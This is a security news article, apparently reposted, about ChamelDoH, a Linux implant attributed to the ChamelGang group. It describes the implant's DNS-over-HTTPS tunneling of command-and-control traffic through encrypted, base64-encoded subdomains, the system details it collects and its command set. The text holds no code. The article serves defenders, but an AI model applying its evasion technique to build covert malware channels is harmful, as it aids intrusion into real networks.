Chinese Hackers Employed DNS-over-HTTPS for Linux Malware Communication


ChamelGang, a sophisticated threat actor believed to be based in China, has been using different tools for intrusions, as identified by the security researchers at Stairwell Threat Research in their recent investigation.

While apart from this, the Threat Research team of Stairwell also found new tools for Linux intrusions that are developed by the group.

ChamelDoH is one of the best instances for this, as it facilitates communication through DNS-over-HTTPS (DoH) tunneling, and it’s an implant that is mainly developed using C++.

Chinese Hackers Targets

The countries listed below have experienced instances of ChamelGang targeting their energy, aviation, and government organizations in the past:-

  • Russia
  • The United States
  • Japan
  • Turkey
  • Taiwan
  • Vietnam
  • India
  • Afghanistan
  • Lithuania
  • Nepal

DNS-over-HTTPS for Linux Malware

By identifying a domain and tool previously encountered in ChamelGang campaigns, Positive Technologies established the association between ChamelGang and the recently discovered Linux malware.

web

For remote access to the system, the sample (34c19cedffe0ee86515331f93b130ede89f1773c3d3a2d0e9c7f7db8f6d9a0a7) is primarily designed, and it’s a large C++ binary.

The sample utilizes DoH tunneling to establish a communication channel with the configured command-and-control (C2) infrastructure.

To encode its communication, the sample employs a modified base64 alphabet, transforming it into subdomains that are directed to a nameserver under the control of the malicious actor.

When the implant is executed, it immediately employs several systems calls to collect reconnaissance data and compile it into a JSON object.

Here below, we have mentioned all the details that are gathered by ChamelDoH when it’s executed:-

  • host_name: System hostname
  • ip: Any IP address for an interface that is not 127.0.0.1
  • system_type: sysname parsed from the system’s utsname struct, i.e. Linux
  • system_version: version parsed from the system’s utsname struct,
  • i.e. #43-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 18 18:21:28 UTC 2023
  • whoami: The user context that ChamelDoH is running under
  • process_pid: The process ID of the ChamelDoH process
  • bits: The bitness of the system, i.e. x86_64
  • pwd: The working directory of the ChamelDoH process
  • id: A pseudo-randomly generated integer generated by ChamelDoH that is used as an implant ID

ChamelDoH distinguishes itself through its original approach to command-and-control (C2) techniques.

While besides this, two keys are used in the JSON object to define the implant’s command-and-control (C2) configuration.

Here the sample contains the following configuration:-

Chinese Hackers Employed DNS-over-HTTPS for Linux Malware Communication

With the help of the configuration, the implant establishes communication with malicious nameservers using DoH requests. 

It encodes its command-and-control (C2) communications as subdomains and initiates TXT requests for the encoded C2 communications within the domain it generates.

Blocking these DoH providers across the entire enterprise is difficult due to their widespread use as DNS servers for legitimate traffic.

Inspecting these requests without intercepting the traffic becomes challenging due to HTTPS, making it difficult for defenders to identify which domain requests are being made via DoH.

This poses a challenge in detecting or obstructing abnormal network traffic, such as the encoded communications utilized by ChamelDoH.

Chinese Hackers Employed DNS-over-HTTPS for Linux Malware Communication

The consequence of this strategy resembles C2 communication through domain fronting, where traffic is initially directed to a legitimate service hosted on a content delivery network (CDN). 

However, it is rerouted to a C2 server using the request’s Host header. While this makes the detection and prevention of this technique completely challenging tasks.

To maintain confidentiality, ChamelDoH uses AES128 encryption to secure its communication. The encrypted data is then transformed into base64 format, allowing it to be inserted as a subdomain.

Capabilities

The implant can perform several types of tasks, and here below, we have mentioned them all along with their commands:-

  • run: Execute a file/shell command
  • sleep: Set number of seconds until next check-in
  • wget: Download a file from a URL
  • upload: Read and upload a file
  • download: Download and write a file
  • rm: Delete a file
  • cp: Copy a file to a new location
  • cd: Change the working directory

Moreover, ongoing analysis is being conducted by the Stairwell Threat Research team to examine ChamelDoH and other tools utilized by ChamelGang, which were previously unidentified.

Looking For an All-in-One Multi-OS Patch Management Platform – Try Patch Manager Plus



Source link